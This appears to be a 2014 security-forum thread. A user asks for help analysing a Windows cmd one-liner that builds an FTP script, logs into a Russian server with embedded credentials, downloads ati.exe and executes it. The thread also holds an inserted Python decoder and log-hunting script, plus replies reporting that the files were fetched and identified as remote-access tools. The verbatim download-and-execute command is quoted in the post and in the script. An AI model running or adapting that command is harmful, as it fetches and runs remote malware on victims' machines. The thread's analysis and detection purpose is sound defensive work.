Please help me analyze this command I found in "run" box on PC

Discussion in 'malware problems & news' started by TexasDon, May 6, 2014.

Thread Status:
Not open for further replies.
  1. TexasDon

    TexasDon Registered Member

    Joined:
    May 6, 2014
    Posts:
    1
    I was checking auto logon and hit the run box. The box came up pre-populated with this:

    cmd /c echo open s2.zalivalka.ru 21 >> ik &echo user u113218 4af438 >> ik &echo binary >> ik &echo get ati.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &ati.exe &exit

    I get that the website is in Russia and it has some FTP commands.

    How would I trace it, and how would I check to see if other PCs in the network are similarly affected?

    It has AVAST and I have run MalwareBytes.

    Thanks
     
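An added example, not part of the thread: the command above writes an FTP script line by line into a temp file (`ik`), feeds it to `ftp.exe -s:`, deletes the script and then runs whatever it fetched. The Python below rebuilds that script from the `echo` stages, pulls out the indicators (server, port, credentials, downloaded and executed file), and runs the same decoder over a constructed set of process-creation records of the kind you would collect from Security event 4688 or Sysmon event 1 on the other machines. The hostnames and records in `SAMPLE_RECORDS` are made up; nothing here contacts the FTP server or runs the payload.

```python
"""Decode an echo-to-file FTP dropper and hunt for it in process-creation logs."""
import re
from dataclasses import dataclass, field

# The exact command from the original post. It is only parsed here, never executed.
DROPPER = ("cmd /c echo open s2.zalivalka.ru 21 >> ik &echo user u113218 4af438 >> ik "
           "&echo binary >> ik &echo get ati.exe >> ik &echo bye >> ik "
           "&ftp -n -v -s:ik &del ik &ati.exe &exit")


@dataclass
class FtpDropper:
    script_file: str                                # temp file the FTP script is echoed into
    host: str = ""
    port: int = 21
    user: str = ""
    password: str = ""
    downloads: list = field(default_factory=list)   # files fetched with 'get'/'mget'
    executed: list = field(default_factory=list)    # downloaded files later run as a stage


def split_chain(cmdline):
    """Split 'cmd /c a & b & c' into its stages ('&' is cmd.exe's unconditional sequencer)."""
    body = re.sub(r"^\s*cmd(?:\.exe)?\s+/[cCkK]\s+", "", cmdline)
    return [s.strip() for s in body.split("&") if s.strip()]


def decode_dropper(cmdline):
    """Rebuild the FTP script from the echo stages and extract IOCs.
    Returns None when the chain does not drive ftp.exe with -s:<file>."""
    stages = split_chain(cmdline)
    script_file = None
    for s in stages:
        m = re.match(r"ftp(?:\.exe)?\b.*?-s:(\S+)", s, re.IGNORECASE)
        if m:
            script_file = m.group(1)
    if script_file is None:
        return None

    d = FtpDropper(script_file)
    echo_re = re.compile(r"echo\s+(.*?)\s*>>?\s*" + re.escape(script_file) + r"$")
    for s in stages:
        m = echo_re.match(s)
        if not m:
            continue
        words = m.group(1).split()
        if not words:
            continue
        verb, args = words[0].lower(), words[1:]
        if verb == "open" and args:                 # open <host> [port]
            d.host = args[0]
            if len(args) > 1 and args[1].isdigit():
                d.port = int(args[1])
        elif verb == "user":                        # user <name> [password]
            d.user = args[0] if args else ""
            d.password = args[1] if len(args) > 1 else ""
        elif verb in ("get", "mget") and args:
            d.downloads.extend(args)

    # Any later stage whose command is one of the downloaded files is execution.
    wanted = {f.lower() for f in d.downloads}
    for s in stages:
        first = s.split()[0].strip('"')
        if first.lower() in wanted:
            d.executed.append(first)
    return d


# Constructed sample of process-creation records (host + command line), shaped like
# what you would pull from Security event 4688 / Sysmon event 1. Not real data.
SAMPLE_RECORDS = [
    {"host": "WS-01", "cmdline": "cmd /c dir C:\\Users"},
    {"host": "WS-02", "cmdline": "ftp -s:C:\\scripts\\nightly.txt files.corp.example"},
    {"host": "WS-03", "cmdline": DROPPER},
    {"host": "WS-04", "cmdline": "cmd /c echo hello >> log.txt & type log.txt"},
]


def hunt(records):
    """Return (host, FtpDropper) for each record whose command line builds an FTP
    script inline and pulls files with it. A plain 'ftp -s:' against a pre-existing
    script (WS-02) is not flagged, since it fetches nothing in the chain itself."""
    hits = []
    for r in records:
        d = decode_dropper(r["cmdline"])
        if d is not None and d.downloads:
            hits.append((r["host"], d))
    return hits


if __name__ == "__main__":
    ioc = decode_dropper(DROPPER)
    print(f"FTP {ioc.host}:{ioc.port} user={ioc.user} pass={ioc.password} "
          f"script={ioc.script_file} gets={ioc.downloads} runs={ioc.executed}")
    for host, d in hunt(SAMPLE_RECORDS):
        print(f"{host}: fetches {d.downloads} from {d.host} and runs {d.executed}")
```

The decoded server, port, account and file name are what you would search for across the fleet: the same command line in process-creation logs, outbound connections to that host on port 21, and the dropped executable name in user profiles and temp directories. Because the script file is deleted at the end of the chain, the command line itself (and any `ftp.exe` child process of `cmd.exe`) is usually the only artefact that survives.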
  2. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
  3. 1PW

    1PW Registered Member

    Joined:
    Apr 2, 2010
    Posts:
    701
    Location:
    North of the 38th parallel.
    I would consider running full scans with both and auditing your overall system security defenses.

    Yes - not good at all...
     
  4. Gullible Jones

    Gullible Jones Registered Member

    Joined:
    May 16, 2013
    Posts:
    1,461
    That would have run the EXE file after downloading it. IMO you should assume the OS is currently compromised. I'll leave more detailed advice to the moderators, as I'm neither a security expert nor much of a Windows guy.

    (I'll get back to you later re the FTP site, if it's still up. Don't want to touch it with a barge pole until I can set up a secure, disposable environment for doing so.)
     
  5. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,073
    When I connected to the FTP server using those credentials I got three files: gotcha, RMS3.exe, RMS3-.exe. The executables will be sent to VT and I'll post the results here.
     
  6. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,073
    Here are results:

    ~ VirusTotal Results Removed per Policy - JRViejo ~
     
    Last edited by a moderator: May 6, 2014
  7. SweX

    SweX Registered Member

    Joined:
    Apr 21, 2007
    Posts:
    6,429
    I deleted the links but left the SHA so people can search on VT if they want. Thanks :thumb:
     
  8. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    5,073
    Should I do the same? Is there a problem if complete URLs to test results are posted? I would worry about the whole command being posted, though. Somebody could replace ati.exe with rms3.exe...
     
  9. SweX

    SweX Registered Member

    Joined:
    Apr 21, 2007
    Posts:
    6,429
    AFAIK posting ANY VT results is against the TOS. And mods rarely leave any MD5 or SHA behind when they delete the links so people can make a search on VT if they like. So I thought I'd delete the VT links but leave the SHA so people can search for the results, since I believe posting MD5, SHA etc. is not against the TOS. :doubt:

    You do as you like, nothing serious will happen just that the links might be deleted :)
     
  10. Gullible Jones

    Gullible Jones Registered Member

    Joined:
    May 16, 2013
    Posts:
    1,461
    hqsec beat me to it...

    VT says those are probably remote access tools. In any case it's obvious enough that they're malware, even if they're not the original file. Probably just updated or something.

    @TexasDon: you should get some help cleaning this thing up. Not sure what the policy around here is re active infections at this point, but there are forums dedicated to such problems, e.g. BleepingComputer:

    http://www.bleepingcomputer.com/forums/

    You might want to post something there - from a clean OS.
     
  11. JRViejo

    JRViejo Global Moderator

    Joined:
    Jul 9, 2008
    Posts:
    20,958
    Location:
    U.S.A.